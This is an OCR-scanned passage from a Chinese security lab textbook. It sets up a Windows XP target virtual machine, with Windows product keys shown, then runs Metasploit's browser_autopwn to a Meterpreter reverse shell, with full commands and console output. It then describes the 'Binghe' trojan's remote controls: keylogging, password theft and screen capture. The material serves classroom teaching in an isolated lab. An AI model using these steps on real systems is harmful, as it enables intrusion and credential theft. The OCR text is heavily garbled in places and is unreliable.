您 希望 使 用 什么 类 型 的 配置 ? 


RAGED 
BILAP HAE Workstation 12.0 
虚拟 机 。 


e BEX (BNC) 
创建 带 有 SCSI 控制 器 类 型 、 虚 拟 磁盘 类 型 
以 及 与 旧版 VMware 产品 兼容 性 等 高 级 选项 
的 虚拟 机 。 














(3) 在 配置 类 型 中 ,选择 “ 自 定义 (高 级 )(C)” 选 项 , 单 击 “ 下 一 步 " 按 钮 。 
CD 在 出 现 的 如 图 11. 2. 2 所 示 的 “选择 虚拟 机 硬件 兼容 性 ”界面 中 ,选择 软件 默认 的 


图 1121 安装 向 导 


“虚拟 机 硬件 兼容 性 ”, 即 Workstation 12.0 即 可 , 单 击 “下 一 步 ? 按 钮 。 























FENNAS im 
选择 虚拟 机 硬件 兼容 性 
该 虚拟 机 需要 何 种 硬件 功能 ? 
虚拟 机 硬件 兼容 性 
FOIE D: 
RE: J] ESX Server(S) 
兼容 产品 : 限制 : 
Fusion 8.x ^ 64 GB ATE 
Workstation 12.0 16 个 处 理 器 
10 个 网 络 适配器 
8 TB 磁盘 大 小 
[is] [n-500» | (aa | 








图 





1122 虚拟 机 兼容 性 设置 


(5) 在 出 现 的 如 图 11.2. 3 所 示 的 “安装 客户 机 操作 系统 "界面 中 ,选择 “安装 程序 光盘 
影像 文件 (iso) (M) ”选项 ,通过 单 击 “ 浏 览 ” 按 钮 找到 刚才 下 载 好 的 系统 镜像 文件 并 添加 , 然 
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后 单 击 “ 下 一 步 ” 按 钮 。 


安装 客户 机 操作 系统 
虚 拱 机 如 同 物理 机 ， 和 需要 操作 系统 。 您 将 如 何 安装 客户 机 操作 系统 ? 





FERR: 
日 去 装 程序 光盘 (D); 
[eld pvo rw apenas (F:) 











© 安装 程序 光盘 映像 文件 (soXM): 
ER TSflen_windows server 2003 enterprse viso ~ [AEO] 


d) 已 检测 到 Windows Server 2003 Enterprise Edition 
AREA RRR GBH?) 


© 稍 后 安装 操作 系统 (S)。 
创建 的 虚拟 机 将 包含 一 个 空白 硬盘 。 











图 123 安装 文件 所 在 路 径 


(6) 此 时 进入 如 图 11. 2. 4 所 示 的 “简易 安装 信息 ”界面 ,需要 用 户 输入 一 个 系统 的 产品 

密 钥 ,可 以 选择 此 时 输入 产品 密 钥 ,也 可 以 直接 单 击 * 下 一 步 "按钮 在 虚拟 机 中 安装 系统 的 时 
候 再 输入 产品 密 钥 。 

FENNAS ax] 


简易 安装 信息 
这 用 于 安装 Windows Server 2003 Enterprise Edition o 








Windows 产品 密 钥 (K) 
XDCTK-FIX33-FX3QX-RCBQR-WC68M 

















124 安装 信息 设置 
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(7) 在 出 现 的 如 图 11. 2. 5 所 示 的 “命名 虚拟 机 ”界面 的 “虚拟 机 名 称 (V)” 选 项 中 ,全 部 





选择 系统 默认 的 设置 , 单 击 “ 下 一 步 ” 按 钮 。 





名 虚拟 机 
您 要 为 此 虚拟 机 使 用 什么 名 称 ? 





虚拟 机 名 称 (V): 
Windows Server 2003 Enterprise Edit 


fam): 











C\Users\jive\Documents\Virtual Machines\Windows Server 2003 t. [. is(R)....] 
TERE" S RA ch TPR RE o 

















A125 安装 路 径 设置 


(8) 在 出 现 的 如 图 11. 2. 6 所 示 的 "处理 器 配置 界面 ,可 以 根据 自己 实验 平台 的 硬件 条 
件 , 自 行 决定 “处 理 器 数量 (P) "以 及 “每 个 处 理 器 的 核心 数量 (C) "的 具体 值 ,本 次 实验 使 用 
的 是 默认 值 单 击 “ 下 一 步 ?按钮 。 
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图 1126 处 理 器 配置 


(9) 在 出 现 的 如 图 11. 2. 7 所 示 的 “此 虚拟 机 内 存 ” 界 面 的 “此 虚拟 机 的 内 存 (M) ”选项 
中 ,同样 可 以 根据 自己 实验 平台 的 硬件 条 件 , 为 虚拟 机 设置 内 存 大 小 ,本 次 实验 选用 的 是 
1024MB, 单 击 “ 下 一 步 ” 按 钮 。 
ano E 
此 虚拟 机 的 内 存 
您 要 为 此 虚拟 机 使 用 多 少 内 存 ? 








指定 分 配给 此 虚拟 机 的 内 存量 。 内 存 大 小 必须 为 4 MB AYER 











GI 此 虚拟 机 的 内 存 (M): 1024 [=| MB 














* a 最 大 推荐 内 存 : 
4GB a 
208 6372 MB 


512M8 a dn 








256 MB 384 MB 

128MB a 

64MB 口 客户 机 操作 系统 最 低 推荐 内 存 : 
32MB 128 MB 


























图 1127 虚拟 机 内 存 设置 


(10) 在 出 现 的 如 图 11. 2. 8 所 示 的 “网 络 类 型 "界面 的 网络 连接 ”选项 中 ,为 虚拟 机 选 
择 “ 使 用 网 络 地 址 转换 (NAT)(E)” 模 式 , 单 击 “ 下 一 步 ” 按 钮 。 


S E x 
新 建 店 拟 机 向 导 l| ww 





O 使 用 桥接 网 络 (R) 
为 客户 机 操作 系统 提供 直接 访问 外 部 以 太 网 网 络 的 权限 。 客 户 机 在 外 部 网 络 上 必须 
有 自己 的 了 地 址 。 

© 使 用 网 络 地 址 转换 (NATXE) 
Pe POE SLES TP 地 址 访问 主机 找 号 连接 或 外 部 以 太 网 网 络 连 接 的 








O 使 用 仅 主机 模式 网 络 (H) 
将 客户 机 操作 系统 连接 到 主机 上 的 专用 虚拟 网 络 * 


日 不 使 用 网 络 连 接 (T) 


























128 网 络 连接 设置 
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QD 在 出 现 的 如 图 11.2. 9 所 示 的 “选择 L/O 控制 器 类 型 "界面 的 “SCSI 控制 器 ?选项 
中 ,选择 软件 推荐 的 LSI Logic(L) 选 项 , 单 击 * 下 一 步 按 钮 。 


ace M -- 

















图 129 IO 类 型 设置 


(12) 在 出 现 的 如 图 11. 2. 10 所 示 的 “选择 磁盘 类 型 ?界面 的 “虚拟 磁盘 类 型 选项 中 , 同 
样 选择 软件 推荐 的 SCSICS) 选 项 , 单 击 “ 下 一 步 ? 按 钮 。 














图 11210 虚拟 磁盘 设置 


(13) 在 出 现 的 如 图 11. 2. 11 所 示 的 “选择 磁盘 ”界面 的 “磁盘 ”选项 中 ,选择 “创建 新 虚 
拟 磁 盘 (V) ”模式 , 单 击 “下 一 步 " 按 钮 。 
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新 建 虚拟 机 向 导 _ Tk 
El 
您 使 用 哪个 谱 盘 ? 








© enge (V) 
虚拟 磁盘 由 主机 文件 系统 上 的 一 个 或 多 个 文件 组 成 ， 客 户 机 操作 系统 会 将 其 视 为 单 
个 硬盘 。 虚拟 磋 盘 可 在 一 台 主机 上 或 多 台 主机 之 间 轻 松 复制 或 移动 。 


| © 使 用 现 有 虚拟 磁盘 (E) 
选择 此 选项 将 重新 使 用 之 前 配置 的 碰 盘 * 


O 使 用 物理 碰 盘 (适用 于 高 级 用 户 )(P) 
选择 此 选项 将 为 虚拟 机 提供 直接 访问 本 地 硬盘 的 权限 。 























Cw [«r-sm][r-5u0»]| ma ] 
图 11211 创建 虚拟 磁盘 


(14) 在 出 现 的 如 图 11. 2. 12 所 示 的 “指定 磁盘 容量 "界面 的 “最 大 磁盘 大 小 (GB)(S)” 
选项 中 ,同样 使 用 软件 建议 的 40. OGB 大 小 ,当然 ,磁盘 容量 大 小 可 以 根据 自己 的 硬件 条 件 
进行 调整 。 不 建议 勾 选 “立即 分 配 所 有 磁盘 空间 ”, 因 为 根据 使 用 大 小 再 分 配 磁盘 空间 大 小 
完全 够 用 ,并 不 会 影响 使 用 效果 。 接 下 来 , 勾 选 “ 将 虚拟 磁盘 拆 分 成 多 个 文件 (M)” 选 项 , 单 
击 “ 下 一 步 ” 按 钮 。 

新 建 店 拟 机 向 导 


指定 磁盘 容量 
磁盘 大 小 为 多 少 ? 

















最 大 磁盘 大 小 (6B)(S): 40.0 |= 
针对 Windows Server 2003 Enterprise Edition 的 建议 大 小 : 40 














回 立即 分 配 所 有 碰 盘 空间 (A)。 


分 配 所 有 容量 可 以 提高 性 能 ， 但 要 求 所 有 物理 磁盘 空间 立即 可 用 。 如 果 不 立即 分 醒 
所 有 空间 ， 虚 拟 磁盘 的 空间 最 初 很 小 ， 会 随 着 您 向 其 中 添加 数据 而 不 断交 大 。 





O 将 虚拟 磁盘 存储 为 单个 文件 (9) 


和 和 


paes 可 以 而 权 检 地 在 计算 机 之 则 称 动 上 所 机 ， 但 可 能 会 降低 大 容量 碰 盘 的 


























图 1212 磁盘 容量 设置 
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(15) 在 出 现 的 如 图 11. 2. 13 所 示 的 “指定 磁盘 文件 ”界面 中 ,同样 选择 软件 默认 的 文件 
名 称 和 磁盘 文件 存储 地 址 , 单 击 “ 下 一 步 ”按钮 。 





将 为 每 2 GB 容 里 的 虚拟 戌 盘 创建 一 个 碰 盘 文件 。 除 第 一 个 文件 之 外 ， 每 个 文件 的 文件 
名 称 将 根据 此 处 所 提供 的 文件 名 称 自动 生成 





Windows Server 2003 Enterprise Edition. vmdk [as | 











图 11213 指定 磁盘 文件 


(16) 此 时 软件 会 提示 已 准备 好 创建 虚拟 机 ,如 图 11. 2. 14 所 示 。 单 击 * 完 成 ”按钮 , 系 
统 会 自动 开启 此 虚拟 机 。 


已 准备 好 创建 虚拟 机 


SEA APRA, HAHAH Windows Server 2003 Enterprise 
Edition VMware Toole 





Windows Server 2003 Enterprise Edition 
C:\Users\jiye\Documents\Virtual Machines\Windows Server.. 
Workstation 12.0 

Windows Server 2003 Enterprise Edition 


40 GB, 拆 分 
1024 MB 


NAT 
CD/DVD, USB 控制 器 , 打印 机 , 声卡 











A124 完成 配置 界面 


(17) 新 建 的 虚拟 机 开启 后 会 进入 Windows XP Professional Setup 界面 ,然后 虚拟 机 会 
自动 安装 好 系统 ,如 图 11. 2. 15 所 示 。 
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Windows XP Profe 


Please wait while Setup copies files 
to the Windows installation folders. 
might take several minutes to conplete. 





图 11215 进入 Wncbws XP Professional Setup 5? TR] 


(18) 可 以 选择 安装 时 输入 密 钥 , 如 图 11.2. 16 所 示 。 


L4 " 
EF Windows 
Windows XP Professional Setup xj 
Collecting 
information Your Product Key 
Your Product Key uniquely identifies your copy of Windows XP. | ^ 


Dynamic 
Update 


Preparing " 
installation The 25-character Product Key appears on the yellow sticker 
on the back of your Windows CD folder. 


Type the Product Key below. 
Q Finalizing 


installation Entering your product key now is optional but strongly 
recommended to help avoid complications during activation 


Product Key: 


CG246 - [GJHG8 = |RGTBF = |M6HCS = putvxd 





图 11216 安装 密 钥 设置 





至 此 ,Windows XP Professional SP3 靶 机 架设 已 全 部 完成 。 

2. Windows Server 2003 SPO 2841 2812 

Metasploit 平台 包含 一 些 针对 浏览 器 及 其 插件 进行 渗透 测试 的 模块 。 渗 透 测 试 人 员 在 
渗透 攻击 之 前 ,需要 首先 了 解 目标 浏览 器 的 种 类 ,版 本 及 插件 类 型 等 浏览 器 信息 ,然后 根据 
这 些 信息 选择 相 适 应 的 可 能 成 功 渗透 攻击 目标 浏览 器 的 模块 进行 测试 。 
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Metasploit 提供 了 一 个 自动 化 浏览 器 攻击 辅助 模块 browser_autopwn, 它 可 以 自动 地 
完成 对 浏览 器 的 种 类 版 本 及 插件 类 型 等 信息 的 采集 。 首 先 提 取 来 访 浏览 器 的 指纹 信息 , 然 
后 在 已 有 的 浏览 器 攻击 模块 中 选取 合适 的 渗透 模块 ,给 浏览 器 发 送 攻 击 网 页 ,最 后 将 渗透 结 
果 记 录 在 数据 库 。 这 个 模块 大 大 简化 了 渗透 测试 的 过 程 ,在 实际 的 渗透 测试 中 作用 明显 。 

(1) 在 BT5 终端 窗口 启动 Metasploit 终端 .进入 后 使 用 search 命令 ,搜索 该 漏洞 相应 
的 模块 ,具体 的 命令 如 下 : 

root@ bt:~ #msfconsole 

msf> search browser autcpwn 


搜索 browser autopwn 模块 的 结果 如 下 : 


Matching Modules 
Name Disclosure Date Rank Description 
auxiLiary/server/orowser_autqown mml — HITP Client Automatic Exploiter 


(2) 通过 上 一 步 中 查找 到 的 攻击 模块 路 径 来 启用 该 攻击 模块 。 
msf> use auxiliary/server/browser autopwn 


(3) 使 用 info 命令 查看 模块 的 基本 信息 。 
查看 到 的 模块 的 详细 信息 如 下 : 


Name: HITP Client Autaratic Exploiter 
Module: auxiliary/server/browser autopwn 
Versicn: 0 


license: BSD License 


Rank: Normal 
Provided by: 
egypt< egypt@metasploit.cam> 
Basic options. 
Name Current Setting Required Description 
LHOST yes The IP address to use for reverse- 
connect payloads 
SEVHOST 0.0.0.0 yes The local host to listen on. This must 
be an address on the local machine or 0.0.0.0 
SRVECRT 8080 yes The local port to listen on. 
SSL false no Negotiate SSL for inoming connections 
ssicert no Path to a custam SSL certificate 
(default is randomly generated) 
SSIVersion SSL3 no Specify the version of SSL that should be used (accepted: SSI2, 
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SSL3, TIS1) 
URIPATH no The URI to use for this exploit (default is random) 


Description: 
This module has three actions. The first (and the default) is 
"WebServer' which uses a carbination of client- side and server- side 
techniques to fingerprint HTTP clients and then autamtically 
exploit them. Next is 'DefangedDetection' which does only the 
fingerprinting part. Lastly, 'list' simply prints the names of all 
exploit modules that would be used by the WebServer action given the 
current MATCH and EXCLUDE cptions. Also adds a "list' command which 
is the same as running with ACTIOF list. 
可 以 看 出 ,模块 的 全 称 为 HTTP Client Automatic Exploiter, H1 egypt 提供 。 
基本 选项 如 下 : 
。LHOST: 设置 接受 靶 机 反弹 连接 的 IP 地 址 。 
。 SRVHOST: 设置 靶 机 访问 的 地 址 ,必须 是 攻击 机 的 本 地 地 址 或 者 0. 0. 0. 0。 
。 SRVPORT: 设置 攻击 机 的 端口 ,默认 为 8080。 
。 SSL: 设置 SSL 传人 连接 。 
。 SSLCert; 设置 客户 端 SSL 证 书 路 径 ,默认 是 随机 生成 的 。 
* SSLVersion: 设置 将 会 用 到 的 SSL 的 版 本 ,默认 是 SSL3。 
。 URIPATH: 设置 攻击 所 用 的 模块 。 
(4) 对 选项 进行 设置 。 
(D 设置 接受 靶 机 反弹 连接 的 TP 地 址 。 


mef auxiliary (orowser autopwn)> set IHOST 10.10.10.128 
设置 后 的 界面 显示 如 下 : 

IHOST= > 10.10.10.128 

@ 设置 靶 机 的 访问 地 址 。 

mef auxiliary (browser autcpun)» set SRVHOST 10.10.10.128 
设置 后 的 界面 显示 如 下 : 

SRVHOST= > 10.10.10.128 

@ 设置 攻击 所 用 的 模块 ,本 次 实验 使 用 auto 参数 ,会 让 模块 自动 选择 攻击 模块 。 
mef auxiliary (browser autcpwn) set URIPATH auto 
设置 后 的 界面 显示 如 下 : 

URIEATH- > auto 

(5) 选项 设置 结束 ,开始 运行 模块 。 


msf auxiliary (orowser autcopwm)> run 
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设置 后 的 模块 运行 结果 如 下 : 


* ] Auxiliary module execution oamleted 


* ] Setup 
* ] Obfuscating initial javascript 2016- 06- 01 03:59:05 - 0400 
msf auxiliary(browser autcpwn)> [* ] Done in 2.340117776 seconds 


* ] Starting exploit modules on host 10.10.10.128... 


qoc 
* ] Starting exploit milti/orowser/firefox escape retval with payload generic/shell reverse tgp 
* ] Using URL: http://10.10.10.128:8080/spxDtRtD 

* ] Server started. 

* ] Starting exploit miülti/orowser/itms overflow with payload generic/shell reverse tcp 

* ] Using URL: http://10.10.10.128:8080/WTEpUpVY 

* ] Starting handler for windows/meterpreter/reverse tcp on port 3333 

* ] Starting handler for generic/shell reverse tcp on port 6666 

* ] Started reverse handler on 10.10.10.128:3333 

* ] Starting the payload handler... 

* ] Starting handler for java/meterpreter/reverse tcp on port 7777 

* ] Started reverse handler on 10.10.10.128:6666 

* ] Starting the payload handler... 

* ] Started reverse hardler on 10.10.10.128:7777 

* ] Starting the payload handler... 


* ] -- - Done, found 56 exploit modules 


* ] Using URL: http://10.10.10.128:8080/auto 
* ] Server started. 


运行 后 并 没有 给 出 所 用 的 结果 ,但 是 在 输出 的 最 后 给 出 了 可 用 的 攻击 模块 的 个 数 为 56 
个 ,并 且 使 用 的 IP 地 址 为 http://10. 10. 10. 128:8080/auto. 

(6) 在 靶 机 中 使 用 浏览 器 打开 模块 生成 IP 地 址 ,并 进行 访问 ,如 图 11.2. 17 所 示 。 

在 攻击 端的 窗口 将 会 看 到 如 下 的 攻击 结果 信息 : 


[* ] 10.10.10.254 browser autcpwn - Handling '/auto' 

[* ] 10.10.10.54 — broer atgm -Hendling '/auto?sessid- TWh jaro OUR 
M@NFAGUIAZOniVLXVZOng4N jcNUO FO  YuMDOS 3d 

[* ] 10.10.10.254 browser autopwn- JavaScript Report: Microsoft Windows:XP:SP3:en- us:x86:MSIE:6.0: 

[* ] 10.10.10.254 browser autcpwn- Reporting: (:05 name- > "Microsoft Windows", :os flavor-» "XP", :o5 sp- 
> "SPS", :08 lang-» "en-us", :ardh- > "x86") 

[* ] 10.10.10.254 browser autcpun — Responding with 44 exploits 

[* ] 10. 10. 10. 254 java _ atamicreferencearray - Sending Java AtcmicReferenceArray Type 
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Æ] Opening page http://10.10.10.128:8080/HECZLPHNQ. .. 


图 11217 浏览 器 访问 


Violation Vulnerability 
* ] 10.10.10.254 java atamicreferencearray - Generated jar to drop (5482 bytes). 
* ] 10. 10. 10. 254 java _ atamicreferencearray - Sending Java AtamicReferenceArray Type 
Violation Vulnerability 
* ] 10.10.10.254 java atamicreferencearray - Generated jar to drop (5482 bytes). 
* ] 10.10.10.254 java jrel7 exec - Java 7 Applet Remote Code Execution handling request 
* ] 10. 10. 10. 254 java _ atamicreferencearray - Sending Java AtamicReferenceArray Type 
Violation Vulnerability 
* ] 10.10.10.254 java atamicreferencearray - Generated jar to drop (5482 bytes). 
* ] 10.10.10.254 java jrel7 exec - Java 7 Applet Remote Code Execution handling request 
* ] 10.10.10.254 java jrel7 glassfish averagerangestatisticimpl - handling request for /Cfoam 
* ] 10.10.10.254 java jrel7 glassfish averagerangestatisticimpl - handling request for /CfOsm/ 
* ] 10.10.10.254 java jrel7 glassfish averagerangestatisticimpl - handling request for /CfOem 
* ] 10.10.10.254 java jrel7 reflection types - handling request for /hSKC 
* ] 10.10.10.254 ie createcbject - Sending exploit HIML... 
* ] 10.10.10.254 ms10 018 ie behaviors - Sending Intemet Explorer DHIML Behaviors Use After Free (target: 
IE 6 SPO- SE2 (onclick))... 
* ] 10.10.10.254 apple quicktime marshaled punk - Sending exploit HIML... 
* ] 10.10.10.254 apple quicktime rtsp - Sending init HIM, 
* ] Sending stage (751104 bytes) to 10.10.10.254 
* ] Meterpreter session 1 opened (10.10.10.128:3333 - > 10.10.10.254:1053) at 2016- 06- 01 08:47:06 — 0400 
* ] Session ID 1 (10.10.10.128:3333 - > 10.10.10.254:1053) processing InitialAutcRunScript "migrate — f' 
* ] Current server process: iexplore.exe (3312) 
* ] Spawning notepad.exe process to migrate to 
+ ] Migrating to 2780 
+] Successfully migrated to process 


可 以 看 出 ,攻击 结果 信息 中 省 略 了 一 些 输出 信息 以 节省 篇 幅 , 但 依然 可 以 看 出 如 下 
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HE: 

客户 端 浏 览 器 的 指纹 信息 , 即 JavaScript Report; Microsoft Windows; XP; SP3:en— 
us:x86:MSIE:6.0:。 

成 功 植 人 攻击 载荷 , 即 Meterpreter session 1 opened(10. 10. 10. 128; 3333 一 > 10. 10. 
10. 254:1053), 且 植 入 的 进程 ID 号 为 1053。 

植 人 攻击 载荷 后 ,模块 会 返回 给 监听 端 一 个 会 话 , 从 之 前 设置 的 LHOST 的 地 址 即 可 获 
取 该 会 话 。 

(7) 在 攻击 端 介入 会 话 。 

CD 在 攻击 端 窗口 输入 下 面 的 命令 : 


sessions - 1 


攻击 窗口 结果 信息 如 下 : 


1 meterpreter x86/win32 DH- CA8822AB9589\ Administrator @DH- CA8822AB9589 10.10.10.128:3333 - > 10.10.10. 
254:1053 (192.168.10.128) 


给 出 了 当前 监听 端的 活动 会 话 。 
@ 可 以 看 出 ,当前 监听 端的 活动 会 话 ID 为 1, 因此 使 用 下 面 的 命令 接 人 会 话 。 


mef auxiliary (orowser_autgqown)> sessions - i 1 
监听 端 结 果 如 下 : 
[* ] Starting interaction with 1... 


@ 使 用 sysinfo 命令 ,查看 靶 机 的 相关 信息 。 


meterpreter> sysinfo 

查看 丢 机 结果 如 下 : 

Computer : DH- CA8822AB9589 

CS : Windows XP (Build 2600, Service Pack 3). 
Architecture : x86 

System Language :en US 

Meterpreter : x86/win32 

至 此 ,已 经 完成 了 对 目标 浏览 器 自动 化 攻击 的 全 过 程 。 
实验 报告 要 求 

。 实验 目的 。 


。 附 上 实验 过 程 的 截图 和 结果 截图 。 
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* 阐述 磁 到 的 问题 以 及 解决 方法 。 
。 阐述 收获 与 体会 。 
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第 12 童 ” 木 马 植 入 与 防范 实验 


实验 器 材 


“冰河 ”和 “ 广 外 男生 ”木马 程序 ,1 套 。 
PC,1G. 


预习 要 求 


(1) 做 好 实验 预习 ,复习 与 木马 有 关 的 内 容 。 
(2) 熟悉 虚拟 机 的 使 用 。 

(3) 熟悉 实验 过 程 和 基本 操作 流程 。 

(4) 做 好 预习 报告 。 


实验 任务 


理解 和 掌握 木马 传播 和 运行 的 机 制 ,通过 手动 删除 木马 ,掌握 检查 木马 和 删除 木马 的 技 
巧 ,学 会 防御 木马 的 相关 知识 ,提高 对 木马 的 安全 防范 意识 。 


实验 环境 


硬件 环境 : Windows 2000/XP 主机 。 
软件 环境 :“ 冰 河 ” 和 "“ 广 外 男生 ”木马 程序 。 


预备 知识 


(1) 木马 的 特性 。 

(2) 木马 的 人 侵 途 径 。 

实验 步 又 

1.“ 冰 河 ” 木 马 的 使 用 

“冰河 ”是 国内 一 款 非常 有 名 的 木马 ,功能 非常 强大 。“ 冰 河 ” 一 般 由 两 个 文件 组 成 ， 
G_Client 和 G_Server。 其 中 G_Server 是 木马 的 服务 器 端 ,就 是 用 来 植 人 目标 主机 的 程序 ; 
G. Client 是 木马 的 客户 端 ,就 是 木马 的 控制 端 。 先 打开 控制 端 G_Client, 弹 出 “冰河 ”的 主 
界面 ,如 图 12.1 所 示 。 

下 面 对 快 捷 工具 栏 的 各 按钮 工具 做 简要 介绍 (从 左 至 右 )。 

CD 添加 主机 : 将 被 监控 端 IP 地 址 添加 至 主机 列表 ,同时 设置 好 访问 口令 及 端口 ,设置 
将 保存 在 Operate. ini 文件 中 ,以 后 不 必 重 新 输入 。 如 果 需 要 修改 设置 ,可 以 重新 添加 该 主 
机 ,或 在 主 界面 重新 输入 访问 口令 及 端口 并 保存 设置 。 
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| 冰河 V2.2 [DARKSUN f] 
zim 编辑 [E] ”设置 [6] 帮助 H] 




















cmm Pee uon 
| siege: [Tecantose =] mn: fe ^ mne: 应 用 [8] 
A eE |D asen | 
文件 大 沾 字 节 ) | 最 后 更 新 时 间 
若 出 现 盘 符 ， 
添加 的 远程 表示 连接 成 功 
主机 列表 显 
示 在 这 里 














图 121 Ka" ERE 


(2) 删除 主机 : 将 被 监控 端 IP 地 址 从 主机 列表 中 删除 (相关 设置 也 将 同时 被 清除 ) 。 

(3) 自动 搜索 : 搜索 指定 子 网 内 安装 有 “冰河 ”的 计算 机 。 

(A) 查看 屏幕 : 查看 被 监控 端 屏幕 。 

(5) 屏幕 控制 : 远程 模拟 鼠标 及 键盘 输入 。 

(6) “冰河 ? 信 使 : 点 对 点 聊天 室 。 

(7) 升级 1. 2 版 本 : 通过 “冰河 ”来 升级 远程 1. 2 版 本 的 服务 器 程序 。 

(8) 修改 远程 配置 : 在 线 修改 访问 口令 、 监 听 端 口 等 服务 器 程序 设置 ,不 需要 重新 上 传 
整个 文件 ,修改 后 立即 生效 。 

(9) 配置 本 地 服务 器 程序 : 在 安装 前 对 G_Server. exe 进行 配置 (例如 是 否 将 动态 IP 发 
送 到 指定 信箱 ,改变 监听 端口 以 及 设置 访问 口令 等 ) 。 

1) 使 用 “冰河 ”对 远程 计算 机 进行 控制 

在 一 台 目 标 主机 上 植 入 木马 , 即 在 此 主机 上 运行 
G_Server, 作 为 服务 器 端 ;在 男 一 台 主 机 上 运行 G_Client, 作 





为 控制 端 。 , porte msi 
打开 控制 端 程序 , 单 击 快捷 工具 栏 中 的 添加 主机 按钮 ， M umm 


弹出 如 图 12. 2 所 示 的 对 话 框 。 
显示 名 称 : 填 人 显示 在 主 界面 的 名 称 。 
主机 地 址 : 填 人 服务 器 端 主机 的 IP 地 址 。 
访问 口令 : 填 人 每 次 访问 主机 的 密码 ,此 处 保留 空白 图 122 添加 计算 机 

即 可 。 
监听 端口 :“ 冰 河 ” 默 认 的 监听 端口 是 7626 ,控制 端 可 以 修改 它 以 绕 过 防火 墙 。 
单 击 “ 确 定 ” 按 钮 . 即 可 以 看 到 主机 面 上 添加 了 名 为 test 的 主机 ,如 图 12.3 所 示 。 
这 时 单 击 test 主机 名 ,如 果 连 接 成 功 , 则 会 显示 服务 器 端 主机 上 的 盘 符 ,图 12. 3 显示 了 
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x 冰河 V2.2 [DARKSUN 专 版 ] 
文件 [F] ”编辑 [E] ”设置 [6] HH 


BRQeRe ee om 


当前 连接 : [test =] ian: freee wane: | 应 用 GI 
Cy 文件 管理 器 | 又 sere | 

Bien LESH THRASH | 晤 后 更新 时 间 

LocalHost ec 
| e» 
Sr 
6 


ER 

















表明 连接 成 功 














图 123 添加 主机 test 


test 主机 内 的 盘 符 ,表示 连接 成 功 。 这 时 就 可 以 像 操 作 自 己 的 计算 机 一 样 操作 远程 目标 计 
算 机 ,比如 打开 C:\WINNT\system32\config 目录 可 以 找到 对 方 主机 上 保存 用 户口 令 的 
SAM 文件 。 

下 面 介 绍 “ 冰 河 ” 的 命令 控制 台 ,“ 冰 河 ”" 的 大 部 分 功能 是 在 这 里 实现 的 , 单 击 “ 命 令 控 制 
台 ” 标 签 ,弹出 命令 控制 台 界 面 ,如 图 12.4 所 示 。 
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124 命令 控制 全 界面 
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可 以 看 出 ,命令 控制 台 分 为 口令 类 命令 .控制 类 命令 、 网 络 类 命令 ,文件 类 命令 .注册 表 
读 写 和 设置 类 命令 。 下 面 简单 介绍 几 个 命令 的 使 用 方法 。 

(1) 口令 类 命令 。 

展开 “口令 类 命令 ”, 如 图 12. 5 所 示 。 
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图 125 口令 类 命令 


系统 信息 及 口令 : 可 以 查看 远程 主机 的 系统 信息 、 开 机 口令 和 缓存 口令 等 ,如 图 12. 5， 
单 击 “ 系 统 信 息 ” 及 口令 ,可 以 看 到 远程 主机 的 Windows 版 本 是 WINNT, 当前 用 户 是 
shiyanshi ,物理 内 存 容量 是 267MB, 除 此 之 外 ,还 可 以 看 到 非常 详细 的 远程 主机 信息 ,这 就 
无 异 于 远程 主机 彻底 暴露 在 攻击 者 面前 。 

历史 口令 : 可 以 查看 远程 主机 以 往 使 用 的 口令 。 

击 键 记 录 : 启动 键盘 记录 后 ,可 以 记录 远程 主机 用 户 击 键 记 录 , 以 此 可 以 分 析出 远程 主 
机 的 各 种 账号 和 口令 或 各 种 秘密 信息 。 

(2) 控制 类 命令 。 

展开 “控制 类 命令 ”, 如 图 12.6 所 示 。 

捕获 屏幕 : 这 个 功能 可 以 使 控制 端 使 用 者 查看 远程 主机 的 屏幕 ,好 像 远 程 主机 就 在 自 
己 面前 一 样 ,这 样 更 有 利于 窃取 各 种 信息 , 单 击 “ 查 看 屏幕 "按钮 ,然后 就 弹出 了 远程 主机 的 
屏幕 ,如 图 12.7 所 示 。 

可 以 看 到 ,远程 主机 屏幕 上 的 内 容 就 显示 在 本 机 上 ,显示 内 容 不 是 动态 的 ,而 是 每 隔 一 
段 时 间 传 来 一 幅 。 

发 送信 息 : 这 个 功能 可 以 使 控制 者 向 远程 计算 机 发 送 Windows 标准 的 各 种 信息 。 

在 “信息 正文 "中 可 以 填 和 人 要 发 给 对 方 的 信息 ,在 图 表 类 型 中 ,可 以 选择 “普通 ”“ 和 警告 ”、 
“询问 ”“ 错 误 ” 等 类 型 ,按钮 类 型 可 以 选择 “确定 ”"“ 是 、 否 ”等 类 型 。 
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图 16 控制 类 命令 
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图 127 捕获 远程 主机 屏幕 


“进程 管理 ”: 这 个 功能 可 以 使 控制 者 查看 远程 主机 上 所 有 的 进程 ,如 图 12. 8 所 示 。 
单 击 “ 查 看 进程 "按钮 ,就 可 以 看 到 远程 主机 上 存在 的 进程 ,甚至 还 可 以 终止 某 个 进程 ， 
只 要 选中 相应 的 进程 ,然后 单 击 “ 终 止 进程 ”按钮 就 可 以 了 。 


窗口 管理 : 可 以 对 远程 主机 上 的 窗口 进行 刷新 、 最 大 化 、 最 小 化 、 激 活 和 隐藏 等 操作 。 
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系统 管理 : 可 以 对 远程 主机 进行 关机 、 重 起 、 重 新 加 载 冰河 、 自 动 卸 载 冰河 等 操作 。 
鼠标 控制 : 可 以 将 远程 主机 上 的 鼠标 锁定 在 某 个 范围 内 。 

其 他 控制 : 可 以 对 远程 主机 进行 自动 拨号 禁止 .桌面 隐藏 .注册 表 锁 定 等 操作 。 
(3) 网 络 类 命令 。 

展开 “网 络 类 命令 ”, 如 图 12.9 所 示 。 
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图 129 网 络 信息 
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创建 共享 : 在 远程 主机 上 创建 自己 的 共享 。 
创建 共享 时 , 先 在 图 12. 10 中 方 框 的 位 置 输入 路 径 和 共享 名 。 
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图 1210 新 建 共享 


在 创建 共享 后 ,再 查看 网 络 信息 项 ,多 出 一 项 磁盘 共享 ,同时 在 对 方 主机 上 可 以 看 到 
WINNT 文件 夹 有 共享 标记 .如 图 12. 11 所 示 。 
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1211 共享 前 后 的 变化 


删除 共享 : 在 远程 主机 上 删除 某 个 特定 的 共享 时 , 单 击 “ 删 除 共 享 ", 输 入 共享 名 , 即 可 
删除 该 共享 。 

网 络 信息 : 查看 远程 主机 上 的 共享 信息 , 单 击 “ 查 看 共享 "按钮 ,可 以 看 到 远程 主机 上 的 
IPC$ .C$ , ADMIN $ 等 共享 和 刚刚 建立 的 thday 共享 ,如 图 12. 12 所 示 。 

(4) 文件 类 命令 。 

展开 “文件 类 命令 ”其 下 面 的 “文本 浏览 *“ 文 件 查 找 "、“ 文 件 复制 “文件 压缩 *"“ 文 件 
